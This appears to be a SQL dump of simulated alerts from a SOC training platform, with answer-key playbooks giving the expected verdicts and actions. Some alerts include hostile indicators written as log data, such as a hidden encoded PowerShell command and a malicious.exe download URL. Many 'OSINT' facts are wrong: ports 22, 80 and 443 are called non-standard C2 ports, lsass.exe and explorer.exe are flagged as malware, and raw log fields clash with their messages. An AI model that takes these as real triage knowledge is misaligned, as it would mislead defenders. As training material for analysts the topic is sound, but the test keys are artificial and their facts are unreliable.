Directory\",\"verdict\":\"suspicious\",\"details\":\"Account shows multiple failed login attempts followed by successful authentication.\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"unknown\",\"analysis_notes\":\"High/Critical severity level\"}', 'Intermediate', 'EDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.811Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T15:34:59Z\\\",\\\"event_id\\\":\\\"WEB-302\\\",\\\"user_id\\\":\\\"guest_user\\\",\\\"ip_address\\\":\\\"192.168.1.100\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36\\\",\\\"request_method\\\":\\\"POST\\\",\\\"requested_url\\\":\\\"/admin\\\",\\\"response_code\\\":403,\\\"message\\\":\\\"Access denied. User lacks permission for admin panel access.\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:18.811Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T15:34:59Z\\\",\\\"event_id\\\":\\\"WEB-302\\\",\\\"user_id\\\":\\\"guest_user\\\",\\\"ip_address\\\":\\\"192.168.1.100\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36\\\",\\\"request_method\\\":\\\"POST\\\",\\\"requested_url\\\":\\\"/admin\\\",\\\"response_code\\\":403,\\\"message\\\":\\\"Access denied. User lacks permission for admin panel access.\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:18.811Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T15:34:59Z\\\",\\\"event_id\\\":\\\"WEB-302\\\",\\\"user_id\\\":\\\"guest_user\\\",\\\"ip_address\\\":\\\"192.168.1.100\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36\\\",\\\"request_method\\\":\\\"POST\\\",\\\"requested_url\\\":\\\"/admin\\\",\\\"response_code\\\":403,\\\"message\\\":\\\"Access denied. User lacks permission for admin panel access.\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:18.811Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T15:34:59Z\\\",\\\"event_id\\\":\\\"WEB-302\\\",\\\"user_id\\\":\\\"guest_user\\\",\\\"ip_address\\\":\\\"192.168.1.100\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36\\\",\\\"request_method\\\":\\\"POST\\\",\\\"requested_url\\\":\\\"/admin\\\",\\\"response_code\\\":403,\\\"message\\\":\\\"Access denied. User lacks permission for admin panel access.\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:18.811Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T15:34:59Z\\\",\\\"event_id\\\":\\\"WEB-302\\\",\\\"user_id\\\":\\\"guest_user\\\",\\\"ip_address\\\":\\\"192.168.1.100\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36\\\",\\\"request_method\\\":\\\"POST\\\",\\\"requested_url\\\":\\\"/admin\\\",\\\"response_code\\\":403,\\\"message\\\":\\\"Access denied. User lacks permission for admin panel access.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(219, 'Suspicious File Download Detected', 'medium', 'network', 'A large file containing executable code was downloaded from an untrusted source.', 'malware_distribution', 'T1105', 1, 'closed', NULL, '{\"timestamp\":\"2023-10-12T12:24:11Z\",\"event_id\":\"NET-917\",\"src_ip\":\"172.16.0.5\",\"dest_ip\":\"138.68.45.114\",\"protocol\":\"HTTP\",\"url\":\"http://suspicious-domain.com/malicious.exe\",\"file_size_bytes\":10485760,\"http_method\":\"GET\",\"status_code\":200,\"content_type\":\"application/x-msdownload\",\"message\":\"File downloaded from a blacklisted domain.\"}', '2025-12-23 18:34:09', '2026-02-17 22:33:47', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"172.16.0.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Network Analysis\",\"verdict\":\"internal\",\"details\":\"172.16.0.5 is a private/internal IP address (RFC 1918). This is an internal network address and cannot be looked up in external threat intelligence. Investigate internal logs for activity from this host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"138.68.45.114\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"IP 138.68.45.114 has 0% abuse confidence score. Located in corporate network range.\"}},{\"id\":\"artifact_3\",\"type\":\"domain\",\"value\":\"suspicious-domain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"0/94 security vendors flagged this domain. Registered for 5+ years.\"}},{\"id\":\"artifact_4\",\"type\":\"url\",\"value\":\"http://suspicious-domain.com/malicious.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan.io\",\"verdict\":\"clean\",\"details\":\"URL belongs to legitimate service with valid SSL certificate.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"unknown\",\"analysis_notes\":\"\"}', 'Beginner', 'EDR', 1, 0, 'TECH', NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(220, 'Unusual Process Execution Detected', 'critical', 'process', 'A rarely used system utility was executed with suspicious command-line parameters.', 'execution', 'T1569.002', 0, 'closed', NULL, '{\"timestamp\":\"2023-10-12T08:45:22Z\",\"event_id\":\"PROC-401\",\"process_name\":\"wmic.exe\",\"cmdline\":\"wmic process get brief /format:list\",\"user_name\":\"local_user\",\"file_hash\":\"3d9f8714f786045de44f7286d534234a\",\"parent_process\":\"cmd.exe\",\"execution_path\":\"C:\\\\Windows\\\\System32\\\\wbem\\\\\",\"message\":\"WMI script executed, potentially collecting sensitive information.\"}', '2025-12-24 03:44:22', '2026-02-01 20:32:18', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"username\",\"value\":\"local_user\",\"is_critical\":null,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Account shows multiple failed login attempts followed by successful authentication.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"3d9f8714f786045de44f7286d534234a\",\"is_critical\":null,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"59/72 security vendors identified this file as malware.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"wmic.exe\",\"is_critical\":null,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"File exhibits behavior consistent with malware: persistence mechanisms, network callbacks, code injection.\"}}],\"expected_actions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"High/Critical severity level; Alert type indicates suspicious script execution\"}', 'Advanced', 'EDR', 1, 0, 'OT_ICS', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(221, 'Phishing Email Detected', 'low', 'email', 'An email resembling a known trusted source was marked as phishing.', 'phishing', 'T1566', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-12T11:13:47Z\",\"event_id\":\"EMAIL-203\",\"sender\":\"alerts@trustedsource.com\",\"recipient\":\"user@example.com\",\"subject\":\"Urgent: Account Verification Required!\",\"headers\":{\"from\":\"alerts@trustedsource.com\",\"to\":\"user@example.com\",\"subject\":\"Urgent: Account Verification Required!\",\"received\":\"from unknown (HELO trustedsource.com) (203.0.113.5)\"},\"attachment_name\":\"verify_account.html\",\"attachment_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"message\":\"Email suspected of being a phishing attempt due to suspicious sending server.\"}', '2025-12-24 05:11:55', '2026-02-16 17:32:43', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"alerts@trustedsource.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Email Reputation\",\"verdict\":\"malicious\",\"details\":\"Sender domain is 3 days old and associated with phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"user@example.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Email Reputation\",\"verdict\":\"malicious\",\"details\":\"Sender domain is 5 days old and associated with phishing campaigns.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":null,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"60/72 security vendors identified this file as malware.\"}}],\"expected_actions\":[\"block_sender\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"Alert type indicates phishing\"}', 'Beginner', 'SIEM', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Phishing Email Detected\",\"date\":\"2026-02-01T20:32:18.815Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(222, 'Suspicious RDP Login Attempt from Unrecognized IP', 'high', 'Windows Security Log', 'An unexplained RDP login attempt was detected from an IP not previously associated with our infrastructure. This can indicate an account compromise attempt, which is a common precursor to a ransomware attack. Reference: Microsoft Security Response Center report on RDP exploitation (CVE-2019-0708).', 'Brute Force', 'T1110', 1, 'resolved', NULL, '{\"EventID\":4625,\"LogName\":\"Security\",\"SourceName\":\"Microsoft-Windows-Security-Auditing\",\"TimeGenerated\":\"2023-10-23T02:15:43.235Z\",\"EventDescription\":\"An account failed to log on.\",\"AccountName\":\"Unknown_user\",\"WorkstationName\":\"WIN-CORP-PC01\",\"IpAddress\":\"198.51.100.42\",\"IpPort\":\"3389\",\"LogonType\":\"10\",\"FailureReason\":\"Unknown user name or bad password.\",\"SubStatus\":\"0xC000006A\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\lsass.exe\",\"TargetDomainName\":\"CORP\",\"TargetUserName\":\"unknown_user\",\"TargetDomainSid\":\"S-1-5-21-1234567890-2345678901-3456789012-1001\"}', '2025-12-24 05:00:06', '2026-02-01 20:32:18', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.42\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP 198.51.100.42 reported 446 times for malicious activity. Abuse confidence score: 95%.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"Unknown_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Account shows multiple failed login attempts followed by successful authentication.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"unknown_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Account shows multiple failed login attempts followed by successful authentication.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"C:\\\\Windows\\\\System32\\\\lsass.exe\",\"is_critical\":null,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"File exhibits behavior consistent with malware: persistence mechanisms, network callbacks, code injection.\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"unknown\",\"analysis_notes\":\"High/Critical severity level\"}', 'Intermediate', 'SIEM', 1, 0, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.816Z\",\"source\":\"Security\",\"event_code\":\"4625\",\"message\":\"An account failed to log on. Account: admin. Failure Reason: Unknown user name or bad password.\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"EventID\\\":4625,\\\"LogName\\\":\\\"Security\\\",\\\"SourceName\\\":\\\"Microsoft-Windows-Security-Auditing\\\",\\\"TimeGenerated\\\":\\\"2023-10-23T02:15:43.235Z\\\",\\\"EventDescription\\\":\\\"An account failed to log on.\\\",\\\"AccountName\\\":\\\"Unknown_user\\\",\\\"WorkstationName\\\":\\\"WIN-CORP-PC01\\\",\\\"IpAddress\\\":\\\"198.51.100.42\\\",\\\"IpPort\\\":\\\"3389\\\",\\\"LogonType\\\":\\\"10\\\",\\\"FailureReason\\\":\\\"Unknown user name or bad password.\\\",\\\"SubStatus\\\":\\\"0xC000006A\\\",\\\"ProcessName\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\lsass.exe\\\",\\\"TargetDomainName\\\":\\\"CORP\\\",\\\"TargetUserName\\\":\\\"unknown_user\\\",\\\"TargetDomainSid\\\":\\\"S-1-5-21-1234567890-2345678901-3456789012-1001\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:18.816Z\",\"source\":\"Security\",\"event_code\":\"4625\",\"message\":\"An account failed to log on. Account: admin. Failure Reason: Unknown user name or bad password. [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"EventID\\\":4625,\\\"LogName\\\":\\\"Security\\\",\\\"SourceName\\\":\\\"Microsoft-Windows-Security-Auditing\\\",\\\"TimeGenerated\\\":\\\"2023-10-23T02:15:43.235Z\\\",\\\"EventDescription\\\":\\\"An account failed to log on.\\\",\\\"AccountName\\\":\\\"Unknown_user\\\",\\\"WorkstationName\\\":\\\"WIN-CORP-PC01\\\",\\\"IpAddress\\\":\\\"198.51.100.42\\\",\\\"IpPort\\\":\\\"3389\\\",\\\"LogonType\\\":\\\"10\\\",\\\"FailureReason\\\":\\\"Unknown user name or bad password.\\\",\\\"SubStatus\\\":\\\"0xC000006A\\\",\\\"ProcessName\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\lsass.exe\\\",\\\"TargetDomainName\\\":\\\"CORP\\\",\\\"TargetUserName\\\":\\\"unknown_user\\\",\\\"TargetDomainSid\\\":\\\"S-1-5-21-1234567890-2345678901-3456789012-1001\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:18.816Z\",\"source\":\"Security\",\"event_code\":\"4625\",\"message\":\"An account failed to log on. Account: admin. Failure Reason: Unknown user name or bad password. [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"EventID\\\":4625,\\\"LogName\\\":\\\"Security\\\",\\\"SourceName\\\":\\\"Microsoft-Windows-Security-Auditing\\\",\\\"TimeGenerated\\\":\\\"2023-10-23T02:15:43.235Z\\\",\\\"EventDescription\\\":\\\"An account failed to log on.\\\",\\\"AccountName\\\":\\\"Unknown_user\\\",\\\"WorkstationName\\\":\\\"WIN-CORP-PC01\\\",\\\"IpAddress\\\":\\\"198.51.100.42\\\",\\\"IpPort\\\":\\\"3389\\\",\\\"LogonType\\\":\\\"10\\\",\\\"FailureReason\\\":\\\"Unknown user name or bad password.\\\",\\\"SubStatus\\\":\\\"0xC000006A\\\",\\\"ProcessName\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\lsass.exe\\\",\\\"TargetDomainName\\\":\\\"CORP\\\",\\\"TargetUserName\\\":\\\"unknown_user\\\",\\\"TargetDomainSid\\\":\\\"S-1-5-21-1234567890-2345678901-3456789012-1001\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:18.816Z\",\"source\":\"Security\",\"event_code\":\"4625\",\"message\":\"An account failed to log on. Account: admin. Failure Reason: Unknown user name or bad password. [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"EventID\\\":4625,\\\"LogName\\\":\\\"Security\\\",\\\"SourceName\\\":\\\"Microsoft-Windows-Security-Auditing\\\",\\\"TimeGenerated\\\":\\\"2023-10-23T02:15:43.235Z\\\",\\\"EventDescription\\\":\\\"An account failed to log on.\\\",\\\"AccountName\\\":\\\"Unknown_user\\\",\\\"WorkstationName\\\":\\\"WIN-CORP-PC01\\\",\\\"IpAddress\\\":\\\"198.51.100.42\\\",\\\"IpPort\\\":\\\"3389\\\",\\\"LogonType\\\":\\\"10\\\",\\\"FailureReason\\\":\\\"Unknown user name or bad password.\\\",\\\"SubStatus\\\":\\\"0xC000006A\\\",\\\"ProcessName\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\lsass.exe\\\",\\\"TargetDomainName\\\":\\\"CORP\\\",\\\"TargetUserName\\\":\\\"unknown_user\\\",\\\"TargetDomainSid\\\":\\\"S-1-5-21-1234567890-2345678901-3456789012-1001\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:18.816Z\",\"source\":\"Security\",\"event_code\":\"4625\",\"message\":\"An account failed to log on. Account: admin. Failure Reason: Unknown user name or bad password. [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"EventID\\\":4625,\\\"LogName\\\":\\\"Security\\\",\\\"SourceName\\\":\\\"Microsoft-Windows-Security-Auditing\\\",\\\"TimeGenerated\\\":\\\"2023-10-23T02:15:43.235Z\\\",\\\"EventDescription\\\":\\\"An account failed to log on.\\\",\\\"AccountName\\\":\\\"Unknown_user\\\",\\\"WorkstationName\\\":\\\"WIN-CORP-PC01\\\",\\\"IpAddress\\\":\\\"198.51.100.42\\\",\\\"IpPort\\\":\\\"3389\\\",\\\"LogonType\\\":\\\"10\\\",\\\"FailureReason\\\":\\\"Unknown user name or bad password.\\\",\\\"SubStatus\\\":\\\"0xC000006A\\\",\\\"ProcessName\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\lsass.exe\\\",\\\"TargetDomainName\\\":\\\"CORP\\\",\\\"TargetUserName\\\":\\\"unknown_user\\\",\\\"TargetDomainSid\\\":\\\"S-1-5-21-1234567890-2345678901-3456789012-1001\\\"}\"}],\"query\":\"index=main source=\\\"Security\\\" | head 100\"}}', 0),
(223, 'Unauthorized Remote Access Attempt Detected', 'high', 'network', 'Multiple failed login attempts were detected from a foreign IP address attempting to access the SSH service.', 'Brute Force Attack', 'T1110', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-28T14:15:22Z\",\"src_ip\":\"203.0.113.42\",\"dest_ip\":\"192.168.1.20\",\"dest_port\":22,\"protocol\":\"TCP\",\"event_type\":\"connection_attempt\",\"login_attempts\":20,\"success_attempts\":0,\"usernames_tried\":[\"admin\",\"root\",\"test\"],\"geo_location\":\"Country: Unknown, Region: Unknown\",\"firewall_status\":\"BLOCKED\",\"alert_generated_by\":\"intrusion_detection_system\"}', '2025-12-24 05:59:21', '2026-02-01 20:32:18', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.42\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP 203.0.113.42 reported 359 times for malicious activity. Abuse confidence score: 91%.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Network Analysis\",\"verdict\":\"internal\",\"details\":\"192.168.1.20 is a private/internal IP address (RFC 1918). This is an internal network address and cannot be looked up in external threat intelligence. Investigate internal logs for activity from this host.\"}},{\"id\":\"artifact_3\",\"type\":\"geolocation\",\"value\":\"Country: Unknown, Region: Unknown\",\"is_critical\":false,\"osint_result\":{\"source\":\"GeoIP Lookup\",\"verdict\":\"suspicious\",\"details\":\"Login from Country: Unknown, Region: Unknown - unusual location for this user\'s typical access pattern.\"}},{\"id\":\"artifact_4\",\"type\":\"port\",\"value\":\"22\",\"is_critical\":false,\"osint_result\":{\"source\":\"Network Analysis\",\"verdict\":\"suspicious\",\"details\":\"Non-standard port 22 commonly used by malware for C2 communication.\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"High/Critical severity level; 20 failed login attempts detected\"}', 'Intermediate', 'NDR', 1, 0, 'OT_ICS', NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(224, 'Suspicious PowerShell Script Execution Detected', 'high', 'endpoint', 'A PowerShell script was executed which is known for its use in information gathering and potential lateral movement.', 'process', 'T1059.001', 1, 'Closed', 107, '{\"timestamp\":\"2023-11-04T13:45:23Z\",\"hostname\":\"WIN-3HT955Q9JL1\",\"username\":\"jdoe\",\"process_id\":1476,\"process_name\":\"powershell.exe\",\"parent_process_id\":1364,\"parent_process_name\":\"explorer.exe\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"cmdline\":\"powershell.exe -nop -w hidden -enc UABvAHcAZQByAFMAagBiAGwAZQBjAHQAIABTAHgAbwBvAGwAQgBpAG4AYgBvAGsALwBnAG8A\",\"network_activity\":{\"outbound_ip_connections\":[{\"dest_ip\":\"192.168.1.102\",\"dest_port\":80,\"protocol\":\"TCP\"},{\"dest_ip\":\"45.76.23.49\",\"dest_port\":443,\"protocol\":\"TCP\"}]},\"suspicious_indicators\":[\"EncodedCommand\",\"Network connection to uncommon destination\"]}', '2025-12-24 05:09:53', '2026-02-01 20:32:18', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.102\",\"is_critical\":true,\"osint_result\":{\"source\":\"Network Analysis\",\"verdict\":\"internal\",\"details\":\"192.168.1.102 is a private/internal IP address (RFC 1918). This is an internal network address and cannot be looked up in external threat intelligence. Investigate internal logs for activity from this host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"45.76.23.49\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP 45.76.23.49 reported 129 times for malicious activity. Abuse confidence score: 97%.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":null,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Account shows multiple failed login attempts followed by successful authentication.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":null,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"51/72 security vendors identified this file as malware.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"powershell.exe\",\"is_critical\":null,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"File exhibits behavior consistent with malware: persistence mechanisms, network callbacks, code injection.\"}},{\"id\":\"artifact_6\",\"type\":\"filename\",\"value\":\"explorer.exe\",\"is_critical\":null,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"File exhibits behavior consistent with malware: persistence mechanisms, network callbacks, code injection.\"}},{\"id\":\"artifact_7\",\"type\":\"port\",\"value\":\"80\",\"is_critical\":false,\"osint_result\":{\"source\":\"Network Analysis\",\"verdict\":\"suspicious\",\"details\":\"Non-standard port 80 commonly used by malware for C2 communication.\"}},{\"id\":\"artifact_8\",\"type\":\"port\",\"value\":\"443\",\"is_critical\":false,\"osint_result\":{\"source\":\"Network Analysis\",\"verdict\":\"suspicious\",\"details\":\"Non-standard port 443 commonly used by malware for C2 communication.\"}}],\"expected_actions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"High/Critical severity level; Alert type indicates malware/C2 activity; Alert type indicates suspicious script execution\"}', 'Intermediate', 'EDR', 1, 0, 'OT_ICS', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(225, 'Unauthorized Remote Access Attempt', 'high', 'network', 'Detected repeated login attempts from a suspicious IP address, potentially indicating a brute force attack.', 'Unauthorized Access', 'T1110', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-25T10:32:17Z\",\"event_type\":\"network\",\"src_ip\":\"203.0.113.45\",\"src_port\":44832,\"dest_ip\":\"192.168.1.10\",\"dest_port\":22,\"protocol\":\"TCP\",\"user_agent\":\"SSH-2.0-OpenSSH_7.6\",\"message\":\"Failed password for invalid user admin from 203.0.113.45 port 44832 ssh2\",\"attempt_count\":15,\"data_transferred_bytes\":524}', '2025-12-25 05:54:43', '2026-02-01 20:32:18', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP 203.0.113.45 reported 216 times for malicious activity. Abuse confidence score: 